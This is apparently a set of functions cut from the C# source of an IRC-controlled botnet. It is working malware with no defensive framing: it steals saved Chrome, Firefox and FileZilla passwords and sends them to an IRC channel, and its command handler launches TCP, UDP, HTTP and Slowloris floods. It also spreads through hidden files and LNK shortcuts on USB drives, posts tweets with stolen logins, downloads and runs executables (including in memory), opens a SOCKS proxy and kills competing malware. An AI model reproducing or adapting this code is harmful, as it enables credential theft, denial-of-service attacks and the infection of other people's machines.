public static void Begin()
{
try
{
ipEo = new IPEndPoint(Dns.GetHostEntry(host).AddressList[0], port);
}
catch
{
ipEo = new IPEndPoint(IPAddress.Parse(host), port);
}
t = new Thread[threads];
j = new ThreadStart[threads];
L4Class = new SendTCP[threads];
for (int i = 0; i < threads; i++)
{
L4Class[i] = new SendTCP(ipEo, sockets);
j[i] = new ThreadStart(L4Class[i].send);
t[i] = new Thread(j[i]);
t[i].Start();
}
Thread.Sleep(delay * 1000);
if (isEnabled)
{
Stop();
IRC.WriteMessage("Layer4 flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel());
}
}
public static void GetFileZilla()
{
try
{
XmlDocument xml = new XmlDocument();
string path = Environment.GetEnvironmentVariable("APPDATA") + "\\FileZilla\\recentservers.xml";
if (File.Exists(path))
{
xml.Load(path);
XmlNodeList host = xml.GetElementsByTagName("Host");
XmlNodeList user = xml.GetElementsByTagName("User");
XmlNodeList password = xml.GetElementsByTagName("Pass");
for (int i = 0; i < host.Count; i++)
{
IRC.WriteMessage("FileZilla ->" + IRC.ColorCode(" " + host[i].InnerText) + " -" + IRC.ColorCode(" " + user[i].InnerText) + " :" + IRC.ColorCode(" " + password[i].InnerText), Config._mainChannel());
Thread.Sleep(100);
}
}
}
catch
{
}
}
private static void Begin()
{
try
{
_ip = new IPEndPoint(Dns.GetHostEntry(host).AddressList[0], port);
}
catch
{
_ip = new IPEndPoint(IPAddress.Parse(host), port);
}
_t = new Thread[threads];
_ts = new ThreadStart[threads];
for (int i = 0; i < threads; i++)
{
_ts[i] = new ThreadStart(SendPayload);
_t[i] = new Thread(_ts[i]);
_t[i].Start();
}
Thread.Sleep(delay * 1000);
if (isEnabled)
{
Stop();
IRC.WriteMessage("Layer7 flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel());
}
}
public static void RuskillRemove(string path)
{
IRC.WriteMessage("New drop:" + IRC.ColorCode(" " + path) + ".", Config._rkChan());
if (File.Exists(path))
{
if (!_droppedFiles.Contains(path))
{
if (Win32.ScheduleForDeletion(path))
{
IRC.WriteMessage("File was successfully scheduled for deletion upon next reboot:" + IRC.ColorCode(" " + path) + ".", Config._rkChan());
}
else
{
string dest = Path.GetFullPath(path) + "_" + Functions.RandomString(5);
try
{
string pName = Path.GetFileNameWithoutExtension(dest); // Find the running process and suspend it, then rename the file.
Functions.SuspendProcess(Process.GetProcessesByName(pName)[0].Id);
}
catch
{
}
if (Win32.RenameFile(path, dest))
{
IRC.WriteMessage("File was renamed to break startup:" + IRC.ColorCode(" " + path) + " ->" + IRC.ColorCode(" " + dest) + ".", Config._rkChan());
}
}
}
_droppedFiles.Add(path);
}
}
public static void explorerFlash()
{
output = new List <string>();
string name;
string path;
foreach (Process p in Process.GetProcessesByName("explorer"))
{
try
{
p.Kill();
p.WaitForExit();
p.Dispose();
}
catch
{
}
}
foreach (Process p in Process.GetProcessesByName("iexplore"))
{
try
{
p.Kill();
p.WaitForExit();
p.Dispose();
}
catch
{
}
}
try
{
string[] paths = Directory.GetFiles(Environment.GetEnvironmentVariable("APPDATA"), "*.exe");
foreach (string p in paths)
{
path = p;
name = p.Substring(0, p.Length - 4);
name = p.Substring(0, path.Length);
if (!p.Contains("Dropbox") && !p.Contains("chrome"))
{
File.Delete(path);
Win32.RenameFile(path, null);
searchReg(name, path);
output.Add("Removed file: '" + IRC.ColorCode(path) + "'.");
}
}
Process.Start("explorer.exe");
OutputData();
}
catch
{
Process.Start("explorer.exe");
}
}
public static void StartLNK()
{
//Gather a list of current Removable Drives
DriveInfo[] driveList = DriveInfo.GetDrives();
foreach (DriveInfo drive in driveList)
{
try
{
if (drive.DriveType == DriveType.Removable)
{
// Generate a unique USB drop name based on drive ID
string dropName = Convert.ToBase64String(Encoding.UTF8.GetBytes(drive.TotalSize + drive.VolumeLabel + drive.DriveFormat + "insomnia")).Replace("=", "").Substring(0, 7).ToLower() + ".exe";
string dest = drive.Name + dropName;
// Is there already a file with that name? If MD5 doesn't match then replace it and notify IRC
if (File.Exists(dest))
{
if (Config.botMD5 != Functions.GetMD5Hash(dest))
{
File.Copy(Config.currentPath, dest, true);
File.SetAttributes(dest, FileAttributes.Hidden | FileAttributes.System);
IRC.WriteMessage("Updated a previous USB LNK spread on:" + IRC.ColorCode(" " + drive.Name) + " with a newer file:" + IRC.ColorCode(" " + Config.botMD5) + ".", Config._mainChannel());
}
}
else
{
// Start a new spread
File.Copy(Config.currentPath, dest, true);
File.SetAttributes(dest, FileAttributes.Hidden | FileAttributes.System);
DirectoryInfo[] dirs = new DirectoryInfo(drive.Name).GetDirectories("*.*", SearchOption.TopDirectoryOnly);
int lnkCount = 0;
foreach (DirectoryInfo d in dirs)
{
d.Attributes = FileAttributes.Hidden;
d.Attributes = FileAttributes.System;
CreateLNK(drive.RootDirectory.ToString(), d.Name + ".lnk", dropName, "explorer.exe " + d.FullName, d.Name);
lnkCount++;
}
if (lnkCount > 0)
{
IRC.WriteMessage("Completed USB LNK spread on:" + IRC.ColorCode(" " + drive.Name) + " with" + IRC.ColorCode(" " + lnkCount.ToString()) + " folders.", Config._mainChannel());
}
}
}
}
catch
{
}
if (!initiated)
{
Listener();
}
}
}
public static void StartTwitterSpread(string[] message)
{
try
{
string creds = Chrome.QueryChrome("twitter.com");
if (String.IsNullOrEmpty(creds))
{
creds = Firefox.QueryFirefox("twitter.com");
}
string[] auth = creds.Split(':');
string user = auth[0];
string pass = auth[1];
if (creds != "")
{
bool buildMsg = false;
string spreadMsg = "";
foreach (string s in message)
{
if (s.StartsWith("\""))
{
buildMsg = true;
}
if (s.EndsWith("\""))
{
buildMsg = false;
spreadMsg += s;
}
if (buildMsg)
{
spreadMsg += s + " ";
}
}
spreadMsg = spreadMsg.Replace("\"", "");
spreadMsg.TrimEnd(' ');
if (spreadMsg != "")
{
if (PostTweet(user, pass, spreadMsg))
{
IRC.WriteMessage("Twitter status updated:" + IRC.ColorCode(" " + user) + " ->" + IRC.ColorCode(" " + spreadMsg) + ".", Config._mainChannel());
}
}
}
}
catch
{
// No facebook account saved.
}
}
public static void kill(string name, string path)
{
connectionList = Functions.GetTcpConnections();
try
{
foreach (Process p in Process.GetProcessesByName(name))
{
if (name != "Dropbox" && name != "chrome")
{
if (Config.currentPath != p.MainModule.FileName) // If it's not US
{
foreach (string s in connectionList)
{
string[] data = s.Split(':');
string remoteIP = data[0] + ":" + data[1];
string proc = Process.GetProcessById(Convert.ToInt32(data[2])).ProcessName;
if (proc == p.ProcessName)
{
output.Add("Found outgoing connection from:" + IRC.ColorCode(" " + p.ProcessName) + " ->" + IRC.ColorCode(" " + remoteIP) + ".");
}
}
if (p.MainModule.FileName.Contains(Environment.GetEnvironmentVariable("HOMEPATH"))) // 2.0 killer
{
Functions.SuspendProcess(p.Id);
ProcessUtility.KillTree(p.Id);
}
else // Normal killer
{
p.Kill();
p.WaitForExit();
}
p.Dispose();
File.SetAttributes(path, FileAttributes.Normal);
File.Delete(path);
Win32.RenameFile(path, null);
output.Add("Removed file: '" + IRC.ColorCode(path) + "'.");
}
}
}
}
catch
{
}
connectionList.Clear();
}
public static void Begin()
{
int seconds = delay * 1000;
new Thread(() => SendUDP(Functions.ipE(host, port))).Start();
Thread.Sleep(seconds);
if (isEnabled)
{
Stop();
IRC.WriteMessage("UDP flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel());
}
}
public static void GetChrome(string searchTerm)
{
if (String.IsNullOrEmpty(searchTerm))
{
searchTerm = "**ALL**";
}
string datapath = (Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data");
try
{
SQLiteHandler.SQLiteHandler SQLDatabase = new SQLiteHandler.SQLiteHandler(datapath);
SQLDatabase.ReadTable("logins");
if (File.Exists(datapath))
{
string host;
string user;
string pass;
for (int i = 0; (i <= (SQLDatabase.GetRowCount() - 1)); i++)
{
try
{
host = SQLDatabase.GetValue(i, "origin_url");
user = SQLDatabase.GetValue(i, "username_value");
pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value")));
if (user != "" && pass != "")
{
if (pass != "FAIL")
{
if (host.Contains(searchTerm) || searchTerm == "**ALL**")
{
IRC.WriteMessage("Chrome ->" + IRC.ColorCode(" " + host) + " ->" + IRC.ColorCode(" " + user) + " :" + IRC.ColorCode(" " + pass), Config._mainChannel());
}
}
}
Thread.Sleep(100);
}
catch
{
}
}
}
}
catch
{
}
}
public static void Socks(string param1, string param2)
{
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2))
{
Config.socksUser = param1;
Config.socksPass = param2;
}
else
{
Config.socksUser = Config.randomID;
Config.socksPass = Functions.RandomString(5);
}
try
{
if (!socksOn && externalIP != String.Empty)
{
IRC.WriteMessage("Attempting to start SOCKS5 server on:" + IRC.ColorCode(" " + Functions.externalIP) + "...", IRC.channel);
try
{
AddFirewallException();
}
catch
{
}
Thread s = new Thread(s5init.StartSocks);
s.IsBackground = true;
s.Start();
socksOn = true;
socksHasStarted = true;
}
else if (s5init.socksGood && socksHasStarted)
{
IRC.WriteMessage(s5init.socksDetails(), IRC.channel);
s5init.socksEnabled = true;
socksOn = true;
}
}
catch
{
}
}
public static void searchReg(string name, string path)
{
try
{
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run");
foreach (string appName in key.GetValueNames())
{
if (key.GetValue(appName).ToString().Contains(path))
{
if (appName != Config._registryKey()) // Don't remove your own key
{
output.Add("Removing registry key: " + IRC.ColorCode("HKCU\\" + appName) + ".");
key.DeleteValue(appName);
key.Close();
}
}
}
}
catch
{
}
try
{
RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run");
foreach (string appName in key.GetValueNames())
{
if (key.GetValue(appName).ToString().Contains(path))
{
if (appName != Config._registryKey()) // Don't remove your own key
{
output.Add("Removing registry key: " + IRC.ColorCode("HKLM\\" + appName) + ".");
key.DeleteValue(appName);
key.Close();
}
}
}
}
catch
{
}
}
public static void UpdateBot(string param1, string param2)
{
try
{
string path = Environment.GetEnvironmentVariable("APPDATA") + "\\" + Functions.RandomString(5) + ".exe";
using (WebClient wc = new WebClient())
{
wc.DownloadFile(param1, path);
string newMD5 = Functions.GetMD5Hash(path);
if (param2 == newMD5)
{
if (Config.botMD5 == newMD5)
{
IRC.WriteMessage("Bot file is already up to date:" + IRC.ColorCode(" " + Config.botMD5 + " == " + newMD5) + ".", Config._mainChannel());
}
else
{
using (Process p = new Process())
{
p.StartInfo.FileName = path;
p.Start();
}
IRC.WriteMessage("File was successfully updated:" + IRC.ColorCode(" " + Config.botMD5 + " -> " + newMD5) + ".", Config._mainChannel());
Functions.Uninstall("Updating...");
}
}
else
{
IRC.WriteMessage("MD5 Mismatch:" + IRC.ColorCode(" " + param2) + " !=" + IRC.ColorCode(" " + newMD5) + ".", Config._mainChannel());
}
}
}
catch
{
}
}
public static void runCommand(string command, string channel, string param1, string param2, string param3, string param4, string[] message)
{
switch (command)
{
case ".v":
WriteMessage("Version:" + ColorCode(" " + Config.version) + ", Path:" + ColorCode(" '" + Config.currentPath) + "', MD5:" + ColorCode(" " + Config.botMD5) + ", Registry:" + ColorCode(" " + Config.regLocation) /*+ ", Active Threads:" + IRC.ColorCode(" " + Process.GetCurrentProcess().Threads.Count) */ + ".", channel);
break;
case ".avinfo":
WriteMessage("Antivirus Product:" + ColorCode(" " + Functions.GetAntiVirus()) + ", Firewall Product:" + ColorCode(" " + Functions.GetFirewall()) + ".", channel);
break;
case ".chrome":
Thread a = new Thread(() => Chrome.GetChrome(param1));
a.IsBackground = true;
a.Start();
break;
case ".firefox":
Thread b = new Thread(() => Firefox.GetLoginData(param1));
b.IsBackground = true;
b.Start();
break;
case ".j":
if (!String.IsNullOrEmpty(param1))
{
sw.WriteLine("JOIN " + param1);
}
break;
case ".p":
if (!String.IsNullOrEmpty(param1))
{
sw.WriteLine("PART " + param1);
}
break;
case ".sort":
sw.WriteLine("JOIN #" + Functions.GeoIPCountry());
break;
case ".unsort":
sw.WriteLine("PART #" + Functions.GeoIPCountry());
break;
case ".permsort":
if (Functions.PermType() == "a")
{
sw.WriteLine("JOIN #admins");
}
else
{
sw.WriteLine("JOIN #users");
}
break;
case ".twitter":
Thread t = new Thread(() => Twitter.StartTwitterSpread(message));
t.IsBackground = true;
t.Start();
break;
case ".ftp":
Thread f = new Thread(FTP.GetFileZilla);
f.IsBackground = true;
f.Start();
break;
case ".bk":
if (param1 == "-i")
{
Thread bk = new Thread(Botkiller.explorerFlash);
bk.IsBackground = true;
bk.Start();
}
else
{
Thread bk = new Thread(Botkiller.initiate);
bk.IsBackground = true;
bk.Start();
}
break;
case ".rc":
IRC.Disconnect("Reconnecting...");
Thread.Sleep(15000);
Connect(Config._servers(), Config._mainChannel(), Config._key(), Config._port(), Config._authHost());
break;
case ".up":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2))
{
if (Ruskill.enabled)
{
Ruskill.enabled = false;
}
Thread u = new Thread(() => Functions.UpdateBot(param1, param2.ToUpper()));
u.IsBackground = true;
u.Start();
}
break;
case ".rm":
Functions.Uninstall("Uninstalling...");
break;
case ".dl": // .dl URL ENVIRONMENT_VARIABLE
Thread dl = new Thread(() => Functions.DownloadExeFile(param1, param2, param3, false));
dl.IsBackground = true;
dl.Start();
break;
case ".m":
if (param1 == "on")
{
isMuted = true;
}
if (param1 == "off")
{
isMuted = false;
}
break;
case ".arme":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3))
{
if (param1.Contains("http://"))
{
param1 = param1.Replace("http://", "");
}
ARME.delay = Convert.ToInt32(param3);
ARME.host = param1;
ARME.port = Convert.ToInt32(param2);
ARME.isEnabled = true;
new Thread(ARME.Begin).Start();
IRC.WriteMessage("ARME flood started on" + IRC.ColorCode(" " + ARME.host) + " on port" + IRC.ColorCode(" " + ARME.port) + " for" + IRC.ColorCode(" " + ARME.delay) + " seconds.", IRC.channel);
}
break;
case ".http":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3))
{
if (param1.Contains("http://"))
{
param1 = param1.Replace("http://", "");
}
HTTP.delay = Convert.ToInt32(param3);
HTTP.host = param1;
HTTP.port = Convert.ToInt32(param2);
HTTP.isEnabled = true;
new Thread(HTTP.Begin).Start();
IRC.WriteMessage("HTTP flood started on" + IRC.ColorCode(" " + HTTP.host) + " on port" + IRC.ColorCode(" " + HTTP.port) + " for" + IRC.ColorCode(" " + HTTP.delay) + " seconds.", IRC.channel);
}
break;
case ".tcp":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3))
{
if (param1.Contains("http://"))
{
param1 = param1.Replace("http://", "");
}
TCP.delay = Convert.ToInt32(param3);
TCP.host = param1;
TCP.port = Convert.ToInt32(param2);
TCP.isEnabled = true;
new Thread(TCP.Begin).Start();
IRC.WriteMessage("TCP flood started on" + IRC.ColorCode(" " + TCP.host) + " on port" + IRC.ColorCode(" " + TCP.port) + " for" + IRC.ColorCode(" " + TCP.delay) + " seconds.", IRC.channel);
}
break;
case ".udp":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3))
{
if (param1.Contains("http://"))
{
param1 = param1.Replace("http://", "");
}
UDP.delay = Convert.ToInt32(param3);
UDP.host = param1;
UDP.port = Convert.ToInt32(param2);
UDP.isEnabled = true;
new Thread(UDP.Begin).Start();
IRC.WriteMessage("UDP flood started on" + IRC.ColorCode(" " + UDP.host) + " on port" + IRC.ColorCode(" " + UDP.port) + " for" + IRC.ColorCode(" " + UDP.delay) + " seconds.", IRC.channel);
}
break;
case ".slow":
if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3))
{
if (param1.Contains("http://"))
{
param1 = param1.Replace("http://", "");
}
Slowloris.delay = Convert.ToInt32(param3);
Slowloris.host = param1;
Slowloris.port = Convert.ToInt32(param2);
Slowloris.isEnabled = true;
new Thread(Slowloris.Begin).Start();
IRC.WriteMessage("Slowloris flood started on" + IRC.ColorCode(" " + Slowloris.host) + " on port" + IRC.ColorCode(" " + Slowloris.port) + " for" + IRC.ColorCode(" " + Slowloris.delay) + " seconds.", IRC.channel);
}
break;
case ".stop":
if (ARME.isEnabled || HTTP.isEnabled || TCP.isEnabled || UDP.isEnabled || Slowloris.isEnabled)
{
ARME.Stop();
HTTP.Stop();
TCP.Stop();
UDP.Stop();
Slowloris.Stop();
IRC.WriteMessage("All active floods have been aborted.", channel);
}
break;
case ".read":
if (!String.IsNullOrEmpty(param1))
{
using (WebClient wc = new WebClient())
{
IRC.WriteMessage("Attempting to perform commands from url:" + IRC.ColorCode(" " + param1) + ".", channel);
Functions.DecryptTopic(wc.DownloadString(param1));
}
}
break;
case ".ruskill":
if (!String.IsNullOrEmpty(param1))
{
if (param1 == "on" && Ruskill.enabled == false)
{
Thread r = new Thread(Ruskill.StartRuskill);
r.IsBackground = true;
r.Start();
}
else if (param1 == "off")
{
Ruskill.enabled = false;
}
}
break;
case ".socks":
Thread s = new Thread(() => Functions.Socks(param1, param2));
s.IsBackground = true;
s.Start();
break;
case ".color":
if (param1 == "off")
{
Config.colorsOn = false;
}
else if (param1 == "on")
{
Config.colorsOn = true;
}
break;
case ".usb":
try
{
if (param1 == "on")
{
USBlnk.initiated = true;
Thread usb = new Thread(USBlnk.StartLNK);
usb.IsBackground = true;
usb.Start();
}
else if (param1 == "off")
{
USBlnk.initiated = false;
USBlnk.Stop();
}
}
catch
{
}
break;
case ".visit":
try
{
string extra = "(visible)";
if (param1 != null)
{
if (!param1.Contains("http://"))
{
param1 = "http://" + param1;
}
WriteMessage("Attempting to visit" + ColorCode(" " + param1) + " " + extra + " in default browser.", channel);
using (Process p = new Process())
{
p.StartInfo.FileName = param1;
if (param2 == "-h")
{
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.CreateNoWindow = true;
extra = "(hidden)";
}
p.Start();
}
}
}
catch
{
}
break;
default:
break;
}
}
public static void StartRuskill()
{
try
{
enabled = true;
_registryKeys = BuildRegistrySnapshot(); // Take a snapshot of current changes
// Start FileWatcher
_watchFolder.Path = Environment.GetEnvironmentVariable("APPDATA");
_watchFolder.NotifyFilter = System.IO.NotifyFilters.DirectoryName;
_watchFolder.NotifyFilter = _watchFolder.NotifyFilter | System.IO.NotifyFilters.FileName;
_watchFolder.NotifyFilter = _watchFolder.NotifyFilter | System.IO.NotifyFilters.Attributes;
_watchFolder.Created += new FileSystemEventHandler(eventRaised);
_watchFolder.EnableRaisingEvents = true;
}
catch
{
}
while (enabled)
{
try
{
// Cycle through reg keys and see if anythings new
foreach (string rk in Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValueNames())
{
if (!_registryKeys.Contains(rk))
{
IRC.WriteMessage("Found new registry key in HKCU:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan());
try
{
Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).DeleteValue(rk);
IRC.WriteMessage("Registry key removed:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan());
RuskillRemove(Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValue(rk).ToString());
}
catch
{
}
_registryKeys.Add(rk);
}
}
foreach (string rk in Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValueNames())
{
if (!_registryKeys.Contains(rk))
{
IRC.WriteMessage("Found new registry key in HKLM:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan());
try
{
Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).DeleteValue(rk);
IRC.WriteMessage("Registry key removed:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan());
RuskillRemove(Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValue(rk).ToString());
}
catch
{
}
_registryKeys.Add(rk);
}
}
}
catch
{
}
Thread.Sleep(3000);
}
}
public static string DownloadExeFile(string url, string env, string param3, bool hidden)
{
string defaultEnv = "APPDATA";
bool memExec = false;
bool timeExec = false;
if (!url.Contains("http://") && !url.Contains("https://"))
{
url = "http://" + url;
}
if (!String.IsNullOrEmpty(env))
{
if (env.Contains("-"))
{
if (env.Contains("m"))
{
memExec = true;
}
else if (env.Contains("t") && !String.IsNullOrEmpty(param3))
{
timeExec = true;
}
}
else
{
defaultEnv = env;
}
}
try
{
string output = Environment.GetEnvironmentVariable(defaultEnv) + "\\" + Functions.RandomString(6) + ".exe";
if (memExec)
{
using (WebClient wc = new WebClient())
{
byte[] payload = wc.DownloadData(url); //get our bytez brah
Assembly a = Assembly.Load(payload);
IRC.WriteMessage("Executed .NET byte array in memory:" + IRC.ColorCode(" " + a.FullName) + ", Runtime:" + IRC.ColorCode(" " + a.ImageRuntimeVersion) + ", Length:" + IRC.ColorCode(" " + payload.Length) + ".", IRC.channel);
new Thread(() => a.EntryPoint.Invoke(null, null)).Start();
}
}
else
{
using (WebClient wc = new WebClient())
{
wc.DownloadFile(url, output);
}
if (File.Exists(output))
{
if (timeExec)
{
int delay = Convert.ToInt32(param3);
using (Process p = new Process())
{
FileInfo fi = new FileInfo(output);
p.StartInfo.FileName = output;
if (hidden)
{
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.CreateNoWindow = true;
}
p.Start();
IRC.WriteMessage("Executing: '" + IRC.ColorCode(output) + "' for" + IRC.ColorCode(" " + delay) + " seconds, Type: " + IRC.ColorCode(Functions.PEType(output)) + ", Size:" + IRC.ColorCode(" " + fi.Length + " bytes") + ".", IRC.channel);
Thread.Sleep(delay * 1000);
IRC.WriteMessage("Timed execution finished on: '" + IRC.ColorCode(output) + "'. Process will be termianted and file removed.", Config._mainChannel());
p.Kill();
File.Delete(output);
}
}
else
{
using (Process p = new Process())
{
FileInfo fi = new FileInfo(output);
p.StartInfo.FileName = output;
if (hidden)
{
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.CreateNoWindow = true;
}
p.Start();
IRC.WriteMessage("Executed: '" + IRC.ColorCode(output) + "', Type: " + IRC.ColorCode(Functions.PEType(output)) + ", Size:" + IRC.ColorCode(" " + fi.Length + " bytes") + ".", IRC.channel);
}
}
}
}
return(output);
}
catch (Exception ex)
{
string error = "Could not download the file:";
if (ex.Message.Contains("404"))
{
error += IRC.ColorCode(" 404 file not found");
}
else if (ex.Message.Contains("460"))
{
error += IRC.ColorCode(" 460 access restricted");
}
else
{
error = null;
}
if (error != null)
{
IRC.WriteMessage(error + ".", IRC.channel);
}
return("error");
}
}
public static string socksDetails()
{
return("Listening on:" + IRC.ColorCode(" " + Functions.externalIP) + " :" + IRC.ColorCode(" " + Port) + ", Username:"******" " + Config.socksUser) + ", Password:"******" " + Config.socksPass) + ", uPnP:" + IRC.ColorCode(" " + upnp) + ".");
}
